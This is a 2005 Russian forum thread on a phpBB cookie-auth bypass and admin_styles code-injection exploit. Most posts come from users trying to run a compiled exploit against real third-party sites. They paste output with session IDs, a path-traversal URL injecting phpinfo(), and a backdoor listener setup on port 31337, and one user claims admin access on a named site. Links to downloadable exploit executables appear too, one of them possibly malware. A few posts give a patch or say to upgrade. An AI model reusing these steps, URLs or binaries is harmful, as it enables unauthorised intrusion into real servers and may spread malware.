Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Обсуждение статей (закрыто) » Обсуждение публикаций
Страницы: 1 2 3 4 5 ... 8 След.
RSS
phpBB User id Auth. Bypass and "admin_styles" Code Inject...
 
#1
Это нравится:0Да/0Нет
14.03.2005 17:47:23
Обсуждение статьи phpBB User id Auth. Bypass and "admin_styles" Code Injection Exploit
 
 
 
#2
Это нравится:0Да/0Нет
15.03.2005 22:46:07
как закрыть багу?
 
 
 
#3
Это нравится:0Да/0Нет
16.03.2005 02:00:58
чёт я догнать не могу, чё за serv.h в коде, сори если вопрос тупой
 
 
 
#4
Это нравится:0Да/0Нет
16.03.2005 10:52:50
уже умельцы выложили в инете скоплированый експ.
а бага в подмене куков? т.е. закрыть дырку с куками и всё?
 
 
 
#5
Это нравится:0Да/0Нет
16.03.2005 12:47:05
Хм,Экслоит работает.
Вываливает -  на работать с этим сидом не хочет.Права обычного пользователя. phpBB 2.0.8
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperй ... 0505f3653237eec312e11bb1b9b6980f
http://www.bugs.ru/?sid=0505f3653237eec312e11bb1b9b6980f
_ recuperation du nom de la table sql ... phpbb OK
_ Injection de la fake templates ...OK
_ Fichier crйe
_ Code executй
http://www.bugs.ru/admin/admin_styles.php?mode=addnew&instal l_to=../../../../../../../../../../../../../../../../../../. ./tmp&nigga=phpinfo();&sid=0505f3653237eec312e11bb1b9b6980f
 
 
 
#6
Это нравится:0Да/0Нет
16.03.2005 13:32:43
Объясните, как это юзать правильно? Я вот что делал:
на одном из левых серверов (217.118.81.xxx)открыл бэкдор
на 31337 порту, далеее запустил бинарник (не компилил сам, а в нете нашел :)
потом
D:\phpbbexp.exe http://www.bugs.ru 217.118.81.xxx 31337
он мне выдает
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperй ... 0505f3653237eec312e11bb1b9b6980f
http://www.bugs.ru/?sid=0505f3653237eec312e11bb1b9b6980f
_ recuperation du nom de la table sql ... phpbb OK
_ Injection de la fake templates ...OK
_ Fichier crйe

На этом всё..на других сайтах так же..как его правильно юзать?
 
 
 
#7
Это нравится:0Да/0Нет
16.03.2005 13:49:06
Открываешь потом урлу.
http://www.bugs.ru/?sid=0505f3653237eec312e11bb1b9b6980f
и тебя автоматически логинит под админом =)
Только у меня получилось этого достичь на alcom.ru
 
 
 
#8
Это нравится:0Да/0Нет
16.03.2005 14:20:27
нее...тут фича не в этом...я под админом и так залогинюсь, эта бага еще 2 недели назад была найдена с куками..тут прикол в другом..сплойт сначала делает тебя админом, а потом с помощью хитрых манипуляций в админке отдает тебе весь сервак, на котором расположен форум
 
 
 
#9
Это нравится:0Да/0Нет
16.03.2005 15:50:25
Цитата
Mag пишет:
 с помощью хитрых манипуляций в админке отдает тебе весь сервак, на котором расположен форум
а ты нашел  - эти манипляции ?:)
 
 
 
#10
Это нравится:0Да/0Нет
16.03.2005 16:28:01
Как закрывать ?????
 
 
 
#11
Это нравится:0Да/0Нет
16.03.2005 16:30:47
Цель эксплоита: phpBB версии до 2.0.13
соответственноЮ, поставить новую версию...
 
 
 
#12
Это нравится:0Да/0Нет
16.03.2005 16:55:49
Цитата
Morph пишет:
    а ты нашел  - эти манипляции ?:)

ну посмотри сам код сплойта :) он создает запись в бд (через бэкап) с фейковым дизайном (темплэйтом), в котором встроена (в смысле присутствует запись в бд) функция eval(), а потом через admin_styles.php выполняет произвольный код в системе, используя эту запись..вот только все до конца я не понял...надо изучить код внимательно
 
 
 
#13
Это нравится:0Да/0Нет
16.03.2005 16:58:23
короче..я подозреваю, что этот сплойт действует не хуже сплойта для параметра highlight ;D только надо научиться его юзать
 
 
 
#14
Это нравится:0Да/0Нет
16.03.2005 18:59:29
Короче, ребята, все ясно.
1) вход на сайт по кукам (от 1 марта 2005 баг, http://www.securitylab.ru/52986.html )
2) бэкап/что-то-там, фигня короче
3) вход на admin/admin_styles.php и дополнительный взлом.
лечится просто:
1) пропатчить баг с куками
2) в admin/admin_styles.php сделать:
найти:
switch( $mode )
{
     case "addnew":
           $install_to = ...
                 $style_name = ...
после этого добавить:
                 $regs = "";
                 if(ereg("[A-Za-z0-9\_-]+", $install_to,$regs))
                 {
                    $install_to = $regs[0];
                 }
                 else
                 {
                   unset($install_to);
                 }

Это простая проверка валидности переменной $install_to: то есть она может содержать только буквы (A-Z и a-z), цифры (0-9), дефис (-) и знак подчеркивания (_)
если знак подчеркивания и дефис не нужны, то пишем:
... if(ereg("[A-Za-z0-9]+", $install_to,$regs)) ...
 
 
 
#15
Это нравится:0Да/0Нет
17.03.2005 08:55:07
Цитата
Гость пишет:
уже умельцы выложили в инете скоплированый експ.
а бага в подмене куков? т.е. закрыть дырку с куками и всё?
где можно найти откомпиленную версию???
 
 
 
#16
Это нравится:0Да/0Нет
17.03.2005 09:31:25
http://overdose.tcpteam.org/phpbbexp.exe
 
 
 
#17
Это нравится:0Да/0Нет
17.03.2005 11:19:59
Блин нифига не работает, пишет
_ recuperation de lindentifiant de session a achouder
 
 
 
#18
Это нравится:0Да/0Нет
17.03.2005 13:14:05
Цитата
Гость Я пишет:
Блин нифига не работает, пишет
_ recuperation de lindentifiant de session a achouder
у меня пишет тоже самое что делать
 
 
 
#19
Это нравится:0Да/0Нет
17.03.2005 17:34:55
А у меня выводит вот что:


C:\WINDOWS\Рабочий стол>phpbbexp.exe http://www.xxxs.com/forum/ 213.177.1
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... 8e0fa4fd894d675ad4a6e1f44926f725
http://www.xxx.com/forum/?sid=8e0fa4fd894d675ad4a6e1f44926f7 25
_ recuperation du nom de la table sql ... cant find


ЧТО ДЕЛАТЬ! ???
 
 
 
#20
Это нравится:0Да/0Нет
17.03.2005 18:41:35
http://co2extracts.biz/anion.exe
exploit
 
 
 
Страницы: 1 2 3 4 5 ... 8 След.
Читают тему